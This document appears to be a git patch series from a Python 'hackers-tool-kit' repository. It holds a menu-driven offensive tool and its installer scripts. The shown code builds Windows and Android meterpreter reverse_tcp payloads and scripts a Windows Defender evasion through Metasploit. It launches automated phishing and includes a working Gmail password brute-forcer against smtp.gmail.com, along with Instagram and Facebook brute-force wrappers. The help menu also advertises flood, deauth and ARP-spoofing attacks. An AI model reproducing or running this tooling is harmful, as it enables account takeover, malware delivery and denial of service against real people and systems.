To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +def upgrade(): + os.system("apt update && apt upgrade") +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +def about(): + print "\033[92m------------------------------------------------------------" + print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" + print "------------------------------------------------------------" + print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" + print "------------------------------------------------------------" + print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" + print "------------------------------------------------------------" + print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" + print "------------------------------------------------------------\033[0m" +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "about": + about() + found = True +mainbanner() +main() From 83741de2c78ba5c5c758068321e6f311cb3de32c Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 25 Mar 2019 05:35:48 +0100 Subject: [PATCH 066/214] Delete install.py --- install.py | 101 ----------------------------------------------------- 1 file changed, 101 deletions(-) delete mode 100644 install.py diff --git a/install.py b/install.py deleted file mode 100644 index 5b31b8d..0000000 --- a/install.py +++ /dev/null @@ -1,101 +0,0 @@ -import sys -import os - -def install(): - os.system("apt install sslscan") - os.system("apt install crunch") - os.system("apt install tcpdump") - os.system("apt install macchanger") - os.system("apt install wafw00f") - os.system("apt install medusa") - os.system("cd /root && git clone https://github.com/thelinuxchoice/shellphish") - os.system("cd /root && git clone https://github.com/1N3/BruteX") - os.system("cd /root/BruteX && ./install.sh") - os.system("apt update") - os.system("pip install mechanize json whois python-whois requests bs4 requests[socks] urlparse cookielib") - os.system("pip install scapy datetime argparse re threading urllib2 modules builtwith smtplib") - os.system("pip install whois") - os.system("pip install builtwith") - os.system("pip install colorama") - os.system("pip install dnspython") - os.system("pip install shodan") - os.system("apt install python-socks -y") - os.system("apt install nmap -y") - os.system("apt install php -y") - os.system("apt install perl -y") - os.system("apt install hashcat -y") - os.system("apt install nc") - os.system("apt install neofetch") - os.system("apt install cupp") - os.system("gem install lolcat") - os.system("cd /root/ && git clone https://github.com/Und3rf10w/kali-anonsurf") - os.system("cd /root/kali-anonsurf && ./installer.sh") - print "\n" - print """entering big download region prepare you anus - if your not ready press ctrl C """ - i = raw_input("press ctrl c to stop hit enter to continue") - os.system("apt install metasploit-framework -y") - os.system("cd && git clone https://github.com/trustedsec/social-engineer-toolkit") - os.system("apt install wifite -y") - os.system("apt install reaver -y") - os.system("apt install aircrack-ng -y") - os.system("cd /root/social-engineer-toolkit && pip install -r requirements.txt") - os.system("python /root/social-engineer-toolkit/setup.py install") - - - -print "are you running on the real kali linux os [y/n]" -check = raw_input("[y/n]> ") -if check == "y" : - print "ok most tools should work for you you might have to install other" - print "things on your os for this to work if it doesnt work" - os.system("sleep 2") - install() - -if check == "n" : - print "then some of the tools in this script might not work" - print "do you want to continue installation [y/n]" - install = raw_input("[y/n]> ") - if install == "y" : - def install(): - os.system("apt install sslscan") - os.system("apt install crunch") - os.system("apt install tcpdump") - os.system("apt install macchanger") - os.system("apt install wafw00f") - os.system("apt install medusa") - os.system("cd /root && git clone https://github.com/thelinuxchoice/shellphish") - os.system("cd /root && git clone https://github.com/1N3/BruteX") - os.system("cd /root/BruteX && ./install.sh") - os.system("apt update") - os.system("pip install mechanize json whois python-whois requests bs4 requests[socks] urlparse cookielib") - os.system("pip install scapy datetime argparse re threading urllib2 modules builtwith smtplib") - os.system("pip install whois") - os.system("pip install builtwith") - os.system("apt install python-socks -y") - os.system("apt install nmap -y") - os.system("apt install php -y") - os.system("apt install perl -y") - os.system("apt install hashcat") - os.system("apt install nc") - os.system("apt install neofetch") - os.system("apt install cupp") - os.system("gem install lolcat") - os.system("cd /root/ && git clone https://github.com/Und3rf10w/kali-anonsurf") - os.system("cd /root/kali-anonsurf && ./installer.sh") - print "\n" - print """entering big download region prepare you anus - if your not ready press ctrl C """ - i = raw_input("press ctrl c to stop hit enter to continue") - os.system("apt install metasploit-framework -y") - os.system("cd && git clone https://github.com/trustedsec/social-engineer-toolkit") - os.system("apt install wifite -y") - os.system("apt install reaver -y") - os.system("apt install aircrack-ng -y") - os.system("cd /root/social-engineer-toolkit && pip install -r requirements.txt") - os.system("python /root/social-engineer-toolkit/setup.py install") - - install() - if install == "n" : - print "thanks for checking out my script" - sys.exit() From 2b3c2f096dc6049205306000504da05fcf6fdd7f Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 25 Mar 2019 00:35:59 -0400 Subject: [PATCH 067/214] Add files via upload --- install.py | 105 +++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 105 insertions(+) create mode 100644 install.py diff --git a/install.py b/install.py new file mode 100644 index 0000000..d1f82ad --- /dev/null +++ b/install.py @@ -0,0 +1,105 @@ +import sys +import os + +def install(): + os.system("apt install sslstrip") + os.system("apt install bettercap") + os.system("apt install sslscan") + os.system("apt install crunch") + os.system("apt install tcpdump") + os.system("apt install macchanger") + os.system("apt install wafw00f") + os.system("apt install medusa") + os.system("cd /root && git clone https://github.com/thelinuxchoice/shellphish") + os.system("cd /root && git clone https://github.com/1N3/BruteX") + os.system("cd /root/BruteX && ./install.sh") + os.system("apt update") + os.system("pip install mechanize json whois python-whois requests bs4 requests[socks] urlparse cookielib") + os.system("pip install scapy datetime argparse re threading urllib2 modules builtwith smtplib") + os.system("pip install whois") + os.system("pip install builtwith") + os.system("pip install colorama") + os.system("pip install dnspython") + os.system("pip install shodan") + os.system("apt install python-socks -y") + os.system("apt install nmap -y") + os.system("apt install php -y") + os.system("apt install perl -y") + os.system("apt install hashcat -y") + os.system("apt install nc") + os.system("apt install neofetch") + os.system("apt install cupp") + os.system("gem install lolcat") + os.system("cd /root/ && git clone https://github.com/Und3rf10w/kali-anonsurf") + os.system("cd /root/kali-anonsurf && ./installer.sh") + print "\n" + print """entering big download region prepare you anus + if your not ready press ctrl C """ + i = raw_input("press ctrl c to stop hit enter to continue") + os.system("apt install metasploit-framework -y") + os.system("cd && git clone https://github.com/trustedsec/social-engineer-toolkit") + os.system("apt install wifite -y") + os.system("apt install reaver -y") + os.system("apt install aircrack-ng -y") + os.system("cd /root/social-engineer-toolkit && pip install -r requirements.txt") + os.system("python /root/social-engineer-toolkit/setup.py install") + + + +print "are you running on the real kali linux os [y/n]" +check = raw_input("[y/n]> ") +if check == "y" : + print "ok most tools should work for you you might have to install other" + print "things on your os for this to work if it doesnt work" + os.system("sleep 2") + install() + +if check == "n" : + print "then some of the tools in this script might not work" + print "do you want to continue installation [y/n]" + install = raw_input("[y/n]> ") + if install == "y" : + def install(): + os.system("apt install sslstrip") + os.system("apt install bettercap") + os.system("apt install sslscan") + os.system("apt install crunch") + os.system("apt install tcpdump") + os.system("apt install macchanger") + os.system("apt install wafw00f") + os.system("apt install medusa") + os.system("cd /root && git clone https://github.com/thelinuxchoice/shellphish") + os.system("cd /root && git clone https://github.com/1N3/BruteX") + os.system("cd /root/BruteX && ./install.sh") + os.system("apt update") + os.system("pip install mechanize json whois python-whois requests bs4 requests[socks] urlparse cookielib") + os.system("pip install scapy datetime argparse re threading urllib2 modules builtwith smtplib") + os.system("pip install whois") + os.system("pip install builtwith") + os.system("apt install python-socks -y") + os.system("apt install nmap -y") + os.system("apt install php -y") + os.system("apt install perl -y") + os.system("apt install hashcat") + os.system("apt install nc") + os.system("apt install neofetch") + os.system("apt install cupp") + os.system("gem install lolcat") + os.system("cd /root/ && git clone https://github.com/Und3rf10w/kali-anonsurf") + os.system("cd /root/kali-anonsurf && ./installer.sh") + print "\n" + print """entering big download region prepare you anus + if your not ready press ctrl C """ + i = raw_input("press ctrl c to stop hit enter to continue") + os.system("apt install metasploit-framework -y") + os.system("cd && git clone https://github.com/trustedsec/social-engineer-toolkit") + os.system("apt install wifite -y") + os.system("apt install reaver -y") + os.system("apt install aircrack-ng -y") + os.system("cd /root/social-engineer-toolkit && pip install -r requirements.txt") + os.system("python /root/social-engineer-toolkit/setup.py install") + + install() + if install == "n" : + print "thanks for checking out my script" + sys.exit() From c642a51a6af0ede86b8e452508ab702c61105fed Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 25 Mar 2019 08:16:54 +0100 Subject: [PATCH 068/214] Delete htk.py --- htk.py | 2024 -------------------------------------------------------- 1 file changed, 2024 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 2a477d9..0000000 --- a/htk.py +++ /dev/null @@ -1,2024 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to show / edit this script without my credit -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -def mainbanner(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -about : about the creator / me -? : displays this message -clear : clears screen except for banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -\033[91m---------------------------------------------------------------------------------\033[0m - """ -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -def wifite(): - os.system("wifite") -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -def netdev(): - os.system("netdiscover") -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def 